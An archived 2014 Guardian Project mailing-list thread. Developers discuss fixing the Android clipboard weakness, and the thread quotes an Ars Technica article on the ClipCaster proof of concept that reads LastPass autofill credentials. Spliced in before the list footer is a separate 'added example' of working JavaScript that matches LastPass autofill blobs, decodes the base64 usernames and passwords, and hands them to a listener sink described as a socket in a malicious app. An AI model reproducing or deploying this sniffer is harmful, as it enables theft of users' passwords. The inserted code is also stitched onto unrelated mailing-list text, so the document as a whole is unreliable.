[guardian-dev] Proof-of-concept exploit against LastPass could easily be extended to other apps.

Josh Steiner josh at vitriolix.com
Mon Nov 24 13:11:01 EST 2014


Agreed, that would be a great proof of concept.  I'll add support to
the StoryMaker's SecureShare library as well.  Once we have this in
production use we should approach LastPass and the others to see if we
can get them to leverage it too.

-Josh

On Mon, Nov 24, 2014 at 3:24 AM, Hans-Christoph Steiner
<hans at guardianproject.info> wrote:
>
> (moving this to guardian-dev)
>
> This would be a very nice application of our TrustedIntents library.  We could
> define an Intent method for handing a password, then add TrustedIntents to
> KeePassDroid and then our apps, especially Orweb and Orfox.  I think that
> would serve as a good example as a way to fix this issue without having to
> change Android itself at all.
>
> .hc
>
> noel hidalgo | gProject:
>> http://arstechnica.com/security/2014/11/using-a-password-manager-on-android-it-may-be-wide-open-to-sniffing-attacks/
>>
>>
>> RISK ASSESSMENT / SECURITY & HACKTIVISM
>> Using a password manager on Android? It may be wide open to sniffing attacks
>>
>> Proof-of-concept exploit against LastPass could easily be extended to other apps.
>>
>> by Dan Goodin - Nov 21, 2014 6:55 pm UTC
>>
>> ANDROID HACKING
>>
>> Aurich Lawson
>>
>> In early 2013, researchers exposed some unsettling risks stemming from
>> Android-based password managers. In a paper titled "Hey, You, Get Off of My
>> Clipboard," they documented how passwords managed by 21 of the most popular such
>> apps could be accessed by any other app on an Android device, even those with
>> extremely low-level privileges. They suggested several measures to help fix the
>> problem.
>>
>> Almost two years later, the threat remains viable in at least some, if not all,
>> of the apps originally analyzed. An app recently made available on Google Play,
>> for instance, has no trouble divining the passwords managed by LastPass, one of
>> the leading managers on the market, as well as the lesser-known KeePassDroid.
>> With additional work, it's likely that the proof-of-concept ClipCaster app would
>> work seamlessly against many other managers, too, said Xiao Bao Clark, the
>> Australia-based programmer who developed it. While ClipCaster does nothing
>> more than display the plaintext of passwords that LastPass and KeePassDroid
>> funnel through Android handsets, a malicious app with only network privileges
>> could send the credentials to an attacker without the user having any idea what
>> was happening.
>>
>> "Besides the insecurity of it, what annoyed me was that I was never told any of
>> this while I was signing up or setting up the LastPass app," Clark wrote in an
>> e-mail. "Instead, I got the strong impression from LastPass that everything was
>> very secure, and I needn't worry about any of it. If they at least told users
>> the security issues using these features brings, then the users themselves could
>> decide on their own trade-off between usability and security. Not mentioning it
>> at all strikes me as disingenuous."
>>
>> Asked if LastPass has ever notified users of the risk, company CEO Joe Siegrist
>> didn't give a yes or no answer. Instead, he responded, "This is an any clipboard
>> activity problem [his emphasis] and impacts any password manager involving the
>> clipboard (100% of them)—the way all password managers have consistently allowed
>> you to enter your password into other apps since Android has existed. This
>> demonstration is aimed at LastPass, but it's the whole of Android that must be
>> addressed."
>>
>> Clark agreed that any Android-based password manager that uses the OS clipboard
>> is susceptible. He strongly recommends that people stop using any app setup that
>> works this way. Many apps use standalone browsers, browser extensions, or
>> software keyboards to enter credentials into login fields. There is no evidence
>> they are susceptible to sniffing. The reason ClipCaster takes special aim at
>> LastPass, Clark said, is simple. It just happened to be the manager he installed
>> on his phone. There are no reports that password managers running on iOS or
>> Windows Phone are vulnerable. But there can be no way to know for sure, since
>> Ars is unaware of any comprehensive study testing the security of managers on
>> those platforms.
>>
>> As already alluded to, the threat stems from the use of the Android clipboard,
>> which acts as a temporary cache for text that is being copied and pasted, either
>> within the same app or from one app to another. Android has no official
>> programming interface that secures the clipboard. By design, its contents are
>> available to any app installed on the phone, from the highest privileged banking
>> app to one with no privileges at all. (ClipCaster, for instance, requires no
>> permissions.) Siegrist rightly noted that any password manager that makes use of
>> the Android clipboard—and there are plenty, including LastPass—is vulnerable.
>>
>> LastPass has several different methods for plucking passwords out of their
>> highly fortified vault and plugging them into the password field of a browser or
>> app. Not all of the options are susceptible to sniffing, but notably, the one
>> LastPass recommends that Android users choose leaves them wide open. The option
>> is known as autofill, a feature that seamlessly plugs passwords into apps and
>> the Chrome browser.
>>
>> Shortly after installing LastPass, Clark came across the 2013 paper that
>> discussed the clipboard vulnerability. It got him wondering about the
>> security of his decision, so he began analyzing the JavaScript autofill uses
>> to populate username and password fields in Chrome. In about an hour, he had
>> a crude but working exploit that monitored the Android clipboard and captured
>> login credentials transported by autofill. His proof-of-concept app works by
>> listening to the notices the clipboard broadcasts to installed apps and looking
>> for familiar patterns in the code.
>>
>> Clark concocted a dummy account containing the username "j.doe at actisec.com" and
>> the password "s4f3p4assw0rd," and observed the way the credentials were funneled
>> through the clipboard. Autofill wrote a blob of code to the clipboard and then
>> pasted it into the address bar of Chrome. The code contained the following
>> telltale lines:
>>
>> if (l_bte) {
>>     l_sfv(l_bte, decodeURIComponent(escape(atob('ai5kb2VAYWN0aXNlYy5jb20='))));
>> }
>> l_sfv(l_bpe, decodeURIComponent(escape(atob('czRmZXBhc3N3MHJk'))));
>>
>> An image of ClipCaster sniffing the password "s4f3p4assw0rd" as a user logs in
>> to Facebook.
>> Xiao Bao Clark
>> "atob" is a JavaScript function for decoding strings that have been
>> converted into base64-encoded representations. Presumably, LastPass
>> developers chose the encoding to make it less obvious to other apps what the
>> clipboard contents are. But to anyone with a modest amount of training,
>> the measure is little more than an exercise in the largely discredited
>> protection known as "security through obscurity." ClipCaster monitors the
>> clipboard for the patterns, decodes the base64 strings and, as illustrated in
>> the image to the right, displays them.
>>
>> In e-mails sent to Ars, Siegrist, the LastPass CEO, rightly noted that
>> the vulnerability isn't unique to his company's product, or even to Android devices.
>>
>> "This is an OS-level issue that impacts everything running on Android," he said.
>> "If you use the clipboard to copy any data, a malicious app could obtain it—like
>> installing a clipboard monitoring software on Windows or a keylogger on Windows.
>> You can compromise your security by installing bad software."
>>
>> Siegrist also noted that attacks like the one carried out by ClipCaster work
>> only when LastPass or another password manager runs on an Android device
>> that has a malicious app installed, and then only when the manager uses the
>> device's clipboard. The CEO said that LastPass users should run only "trusted"
>> apps, meaning those distributed over Google Play by a trusted company and widely
>> used and reviewed.
>>
>> Still, his statements omit some important distinctions. First, LastPass on
>> Windows doesn't use the clipboard to pass login credentials to Chrome,
>> and presumably other browsers, Clark's research found. And second, most Windows
>> users—and a growing number of Mac users as well—use antivirus protection to
>> detect such threats. Android antivirus apps exist, but there's little evidence
>> that most users install one. Third, his advice about installing only trusted
>> apps is sound, but given the regular occurrence of malicious apps that slip
>> through Google defenses and are hosted in the company's official Play Store,
>> it's unrealistic to expect end users to always spot rogue titles.
>>
>> One of the key defenses of Android is its application sandbox, which prevents
>> one app from accessing sensitive data belonging to another app, presumably under
>> the premise that not all apps will be trustworthy. When an app as sensitive as a
>> password manager doesn't enjoy a protection as crucial as this, the companies
>> should make this limitation explicit. LastPass and the developers of other
>> vulnerable managers should be forthright about the risks and tell users what
>> they can do to protect themselves. In the case of LastPass, the threat can be
>> eliminated simply by
>> opting out of the recommended autofill option and instead using the LastPass
>> browser or LastPass keyboard. Many users may decide the convenience of autofill
>> is worth the added risk, but at least they will be making an informed choice.
>>
>> Dan Goodin / Dan is the Security Editor at Ars Technica, which he joined in 2012
>> after working for The Register, the Associated Press, Bloomberg News, and other
>> publications.
>> @dangoodin001
>>
>>
>>
>>
>> _______________________________________________
>> Guardian-internal mailing list
>>
>> Post: Guardian-internal at lists.mayfirst.org
>> List info: https://lists.mayfirst.org/mailman/listinfo/guardian-internal
>>
>>
>
> --
> PGP fingerprint: 5E61 C878 0F86 295C E17D  8677 9F0F E587 374B BE81
> _______________________________________________
> Guardian-dev mailing list
>
> Post: Guardian-dev at lists.mayfirst.org
> List info: https://lists.mayfirst.org/mailman/listinfo/guardian-dev
>
> To Unsubscribe
>         Send email to:  Guardian-dev-unsubscribe at lists.mayfirst.org
>         Or visit: https://lists.mayfirst.org/mailman/options/guardian-dev/josh%40vitriolix.com
>
> You are subscribed as: josh at vitriolix.com
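The parsing step ClipCaster performs on a blob like the one quoted in the article, as an added example (this is not ClipCaster's, LastPass's or Guardian Project's code). It assumes the clipboard text contains the two l_sfv(...) calls the article shows; the identifiers l_sfv, l_bte and l_bpe come from that excerpt, and reading l_bte as the username slot and l_bpe as the password slot is an assumption based on which value each carried there. The sample blob is constructed from the article's lines. One caveat: the base64 the article quotes for the password decodes to s4fepassw0rd, not the s4f3p4assw0rd the prose gives, and the example uses the quoted string as-is. Runs under Node.

```javascript
// ClipCaster-style sniffing of a LastPass autofill blob, reduced to its
// parsing core. Added example, not ClipCaster's or LastPass's code. It assumes
// the clipboard text contains the l_sfv(...) calls quoted in the article; the
// identifiers l_sfv, l_bte and l_bpe are taken from that excerpt, and mapping
// l_bte -> username and l_bpe -> password is an assumption based on which
// value each carried in the excerpt.

// decodeURIComponent(escape(atob(b64))) is the old browser idiom for
// "base64 -> raw bytes -> UTF-8 string". Node's Buffer does the same thing,
// so the obfuscation costs an observer exactly one library call.
function decodeAutofillString(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

// The inverse, used only to build constructed blobs of the same shape.
function encodeAutofillString(s) {
  return Buffer.from(s, 'utf8').toString('base64');
}

// One l_sfv(<target>, decodeURIComponent(escape(atob('<base64>')))) call.
// atob accepts only the standard alphabet, so the capture group is limited to it.
const AUTOFILL_CALL =
  /l_sfv\(\s*(l_bte|l_bpe)\s*,\s*decodeURIComponent\(\s*escape\(\s*atob\(\s*'([A-Za-z0-9+\/=]+)'\s*\)\s*\)\s*\)\s*\)/g;

// Assumed meaning of the two targets (see lead-in).
const TARGET_FIELD = { l_bte: 'username', l_bpe: 'password' };

// Returns {username, password} (whichever were present) or null when the
// clipboard text does not look like an autofill blob at all.
function sniffAutofillBlob(clipText) {
  const creds = {};
  for (const m of clipText.matchAll(AUTOFILL_CALL)) {
    creds[TARGET_FIELD[m[1]]] = decodeAutofillString(m[2]);
  }
  return Object.keys(creds).length > 0 ? creds : null;
}

// Stand-in for Android's ClipboardManager.OnPrimaryClipChangedListener: every
// clipboard update goes through here, and only updates that parse as autofill
// are forwarded to the sink (a screen in ClipCaster, a socket in a malicious app).
function makeClipListener(sink) {
  return function onPrimaryClipChanged(clipText) {
    const creds = sniffAutofillBlob(clipText);
    if (creds) sink(creds);
    return creds;
  };
}

// Constructed helper: builds a blob in the shape of the article's excerpt.
function makeBlob(username, password) {
  return [
    'if (l_bte) {',
    `    l_sfv(l_bte, decodeURIComponent(escape(atob('${encodeAutofillString(username)}'))));`,
    '}',
    `l_sfv(l_bpe, decodeURIComponent(escape(atob('${encodeAutofillString(password)}'))));`,
  ].join('\n');
}

// Constructed sample: the exact lines and base64 strings quoted in the article.
const ARTICLE_BLOB = [
  'if (l_bte) {',
  "    l_sfv(l_bte, decodeURIComponent(escape(atob('ai5kb2VAYWN0aXNlYy5jb20='))));",
  '}',
  "l_sfv(l_bpe, decodeURIComponent(escape(atob('czRmZXBhc3N3MHJk'))));",
].join('\n');

// Feeds three clipboard updates through the listener and returns what leaked.
function runDemo() {
  const seen = [];
  const listener = makeClipListener((c) => seen.push(c));
  listener('meeting at 3pm, bring the slides');   // ordinary text: ignored
  listener(ARTICLE_BLOB);                         // article's blob: captured
  listener(makeBlob('alice', 'pässwörd ✓'));      // non-ASCII survives the decode
  return seen;
}

console.log(runDemo());
```

The listener needs no permission to register, which is why ClipCaster ships with none; the only thing standing between the blob and a reader is the base64 layer, which the decode step above strips in one call.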


More information about the Guardian-dev mailing list